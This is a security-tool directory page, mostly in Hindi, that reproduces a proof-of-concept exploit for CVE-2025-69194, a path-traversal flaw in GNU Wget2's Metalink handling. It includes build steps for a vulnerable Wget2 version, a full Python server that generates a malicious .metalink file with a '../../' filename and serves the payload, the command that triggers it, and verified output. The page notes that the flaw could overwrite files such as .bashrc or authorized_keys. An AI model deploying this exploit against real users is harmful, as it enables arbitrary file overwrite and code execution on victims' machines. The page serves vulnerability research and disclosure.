Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC_CVE-2025-69194 — CVE-2025-69194 के लिए PoC, GNU Wget2 <= 2.2.0 में एक पाथ ट्रैवर्सल भेद्यता। यह भेद्यता हमलावरों को हेरफेर किए गए फ़ाइल नाम विशेषताओं वाली दुर्भावनापूर्ण Metalink फ़ाइल प्रदान करके पीड़ित की फ़ाइल प्रणाली पर मनमानी फ़ाइल लेखन या अधिलेखन प्राप्त करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/secdongle/poc_cve-2025-69194
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsecdongle/poc_cve-2025-69194

POC_CVE-2025-69194

CVE-2025-69194 के लिए PoC, GNU Wget2 <= 2.2.0 में एक पाथ ट्रैवर्सल भेद्यता। यह भेद्यता हमलावरों को हेरफेर किए गए फ़ाइल नाम विशेषताओं वाली दुर्भावनापूर्ण Metalink फ़ाइल प्रदान करके पीड़ित की फ़ाइल प्रणाली पर मनमानी फ़ाइल लेखन या अधिलेखन प्राप्त करने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
1138 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-69194: GNU Wget2 पाथ ट्रैवर्सल भेद्यता

📝 विवरण

CVE-2025-69194 के लिए PoC, GNU Wget2 <= 2.2.0 में एक गंभीर पाथ ट्रैवर्सल भेद्यता (v1.99.1 पर सत्यापित)। यह भेद्यता हमलावरों को हेरफेर किए गए file name विशेषताओं वाली दुर्भावनापूर्ण Metalink फ़ाइल प्रदान करके पीड़ित के फ़ाइल सिस्टम पर मनमाना फ़ाइल लेखन या अधिलेखन प्राप्त करने की अनुमति देती है।

जब Wget2 --force-metalink विकल्प का उपयोग करके Metalink फ़ाइल संसाधित करता है, तो यह डायरेक्टरी ट्रैवर्सल अनुक्रमों (जैसे ../../) को ठीक से स्वच्छ करने में विफल रहता है। यदि हमलावर संवेदनशील सिस्टम फ़ाइलों (जैसे .bashrc, .ssh/authorized_keys) या सिस्टम बाइनरी को अधिलेखित करता है तो यह रिमोट कोड एक्ज़ीक्यूशन (RCE) का कारण बन सकता है।


🛠️ परीक्षण वातावरण (Ubuntu 22.04)

भेद्यता को सटीक रूप से पुन: उत्पन्न करने के लिए, हम स्रोत से Wget2 v1.99.1 संकलित करते हैं ताकि यह सुनिश्चित हो सके कि भेद्य Metalink मॉड्यूल सक्रिय और अनपैच्ड है।

1. निर्भरताएँ स्थापित करें

root@kitploit:~
sudo apt update && sudo apt install -y build-essential libgnutls28-dev libxml2-dev \
                     libzstd-dev liblzma-dev libpcre2-dev libidn2-dev libpsl-dev \
                     libbrotli-dev autoconf automake libtool gettext pkg-config python3

2. Wget2 v1.99.1 संकलित और स्थापित करें

root@kitploit:~
wget https://ftp.gnu.org/gnu/wget/wget2-1.99.1.tar.gz
tar -xvf wget2-1.99.1.tar.gz && cd wget2-1.99.1
./configure --with-libxml2
make -j$(nproc)
sudo make install && sudo ldconfig

# Verify installation (+metalink support is required)
wget2 --version | grep -E "1.99.1|metalink"


🚀 प्रूफ ऑफ कॉन्सेप्ट (PoC)

1. हमलावर पक्ष (पायथन एक्सप्लॉइट सर्वर)

हमलावर एक दुर्भावनापूर्ण .metalink फ़ाइल और संबंधित पेलोड होस्ट करता है। निम्नलिखित को poc.py के रूप में सहेजें:

root@kitploit:~
import os
import hashlib
import http.server
import socketserver
import threading
import time

# --- 配置区 ---
TARGET_FILE_NAME = "../../pwned_test.txt"  # 想要穿越到的目标路径
PAYLOAD_CONTENT = "pwned by CVE-2025-69194\n"
PORT = 8000
METALINK_FILE = "exploit.metalink"
PAYLOAD_FILE = "evil.dat"


def create_files():
    # 1. 创建载荷文件
    with open(PAYLOAD_FILE, "w") as f:
        f.write(PAYLOAD_CONTENT)

    # 计算 SHA256
    sha256_hash = hashlib.sha256(PAYLOAD_CONTENT.encode()).hexdigest()
    file_size = len(PAYLOAD_CONTENT)

    # 2. 构造恶意的 Metalink 结构
    metalink_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<metalink xmlns="http://www.metalinker.org/">
  <files>
    <file name="{TARGET_FILE_NAME}">
      <size>{file_size}</size>
      <verification>
        <hash type="sha256">{sha256_hash}</hash>
      </verification>
      <resources>
        <url type="http">http://127.0.0.1:{PORT}/{PAYLOAD_FILE}</url>
      </resources>
    </file>
  </files>
</metalink>
'''
    with open(METALINK_FILE, "w") as f:
        f.write(metalink_content)
    print(f"[+] 恶意文件 {METALINK_FILE} 已生成。")


def start_server():
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", PORT), handler) as httpd:
        print(f"[*] 恶意服务器已在端口 {PORT} 启动...")
        httpd.serve_forever()


if __name__ == "__main__":
    # 清理旧文件
    if os.path.exists(TARGET_FILE_NAME):
        os.remove(TARGET_FILE_NAME)

    create_files()

    # 启动后台服务器
    server_thread = threading.Thread(target=start_server, daemon=True)
    server_thread.start()

    time.sleep(1)  # 等待服务器就绪

    print("\n[!] 现在请在另一个终端执行以下命令进行复现:")
    print(f"wget2 --force-metalink -i {METALINK_FILE}")
    print(f"\n[!] 执行后,检查目标文件是否存在:")
    print(f"ls {TARGET_FILE_NAME} && cat {TARGET_FILE_NAME}")

    # 保持主线程运行
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[+] 演示结束,正在清理...")


2. पीड़ित पक्ष (एक्सप्लॉइट ट्रिगर करना)

सब-डायरेक्टरी (जैसे ~/Downloads/CVE-2025-69194/) में निम्नलिखित कमांड चलाएँ ताकि डायरेक्टरी एस्केप देखा जा सके:

root@kitploit:~
# Pre-check: Verify the file does not exist in the parent's parent directory
ls ../../pwned_test.txt

# Execute the exploit
wget2 --force-metalink -i exploit.metalink


📊 तकनीकी विश्लेषण

भेद्यता Metalink पार्सिंग लॉजिक में मौजूद है जहाँ name विशेषता को सामान्यीकरण के बिना विश्वसनीय माना जाता है।

चरणविवरण
इनपुटWget2 <file name="../../pwned_test.txt"> पढ़ता है।
बाईपासयह देखने के लिए कोई जाँच नहीं की जाती कि पथ में ../ है या CWD छोड़ने का प्रयास करता है।
लेखनWget2 हल किए गए पथ CWD + ../../pwned_test.txt को खोलता है और सत्यापित पेलोड लिखता है।

📝 नमूना आउटपुट (सत्यापित)

सफल पुनरुत्पादन में प्रदर्शित किए अनुसार, pwned_test.txt फ़ाइल निष्पादन फ़ोल्डर से दो स्तर ऊपर बनाई गई थी:

root@kitploit:~
lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt
ls: cannot access '../../pwned_test.txt': No such file or directory

lele@u22:~/Downloads/CVE-2025-69194$ wget2 --force-metalink -i exploit.metalink
downloading part 1/1 (0-23) ../../pwned_test.txt from 127.0.0.1
HTTP response 200 OK [http://127.0.0.1:8000/evil.dat]
part 1 downloaded
../../pwned_test.txt checking...
Checksum OK for '../../pwned_test.txt'

lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt && cat ../../pwned_test.txt
../../pwned_test.txt
pwned by CVE-2025-69194


version poc test

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस जानकारी के दुरुपयोग से होने वाली किसी भी क्षति के लिए ज़िम्मेदार नहीं है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच सख्त वर्जित है।

टूल डाउनलोड करें